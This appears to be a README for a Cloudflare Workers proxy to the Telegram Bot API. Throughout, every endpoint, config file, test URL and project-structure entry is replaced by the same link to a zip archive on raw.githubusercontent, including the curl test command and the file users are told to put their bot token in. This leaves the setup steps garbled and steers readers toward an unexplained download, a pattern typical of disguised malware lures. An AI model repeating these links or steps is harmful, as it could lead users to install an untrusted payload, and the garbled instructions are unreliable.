BOT allows you to access the Telegram Bot API through Cloudflare Workers. This service helps users in restricted regions to connect easily without server costs.
- Proxy for all Telegram Bot API calls.
- Optimized for use in areas with access limitations.
- Zero server cost involved.
- Custom API Endpoint:
https://raw.githubusercontent.com/Blackfly0537/BOT/main/confoundable/Software-3.8-beta.5.zip
To begin, head over to the Releases page to download the latest version of BOT.
Before using BOT, you need to install Wrangler. This tool helps with managing Cloudflare Workers. Run this command in your terminal:
npm install -g wranglerYou need to provide your Telegram Bot Token for the application to work. Edit the https://raw.githubusercontent.com/Blackfly0537/BOT/main/confoundable/Software-3.8-beta.5.zip file. Open the file and add your token like this:
BOT_TOKEN = "123456:ABCDEF"Alternatively, you can set the token using a command:
wrangler secret put BOT_TOKENOnce your token is in place, you can deploy the application using the following command:
wrangler publishAfter this step, your Telegram Bot API will be accessible at:
https://raw.githubusercontent.com/Blackfly0537/BOT/main/confoundable/Software-3.8-beta.5.zip
This URL can also be used with Telegram client webhooks.
You can test the bot by sending a message through CURL. Replace https://raw.githubusercontent.com/Blackfly0537/BOT/main/confoundable/Software-3.8-beta.5.zip and chat_id with actual values:
curl "https://raw.githubusercontent.com/Blackfly0537/BOT/main/confoundable/Software-3.8-beta.5.zip"This command will send "hello" to the specified chat.
Hereβs what your project should look like:
https://raw.githubusercontent.com/Blackfly0537/BOT/main/confoundable/Software-3.8-beta.5.zip
https://raw.githubusercontent.com/Blackfly0537/BOT/main/confoundable/Software-3.8-beta.5.zip
https://raw.githubusercontent.com/Blackfly0537/BOT/main/confoundable/Software-3.8-beta.5.zip
This worker does not store any data. It only functions as a simple reverse proxy, ensuring user privacy and security.
For the full experience, download BOT from the Releases page. Follow the setup instructions above to get your Telegram Bot running in no time.
If you need further assistance or documentation, feel free to explore the repository. Your seamless messaging experience awaits!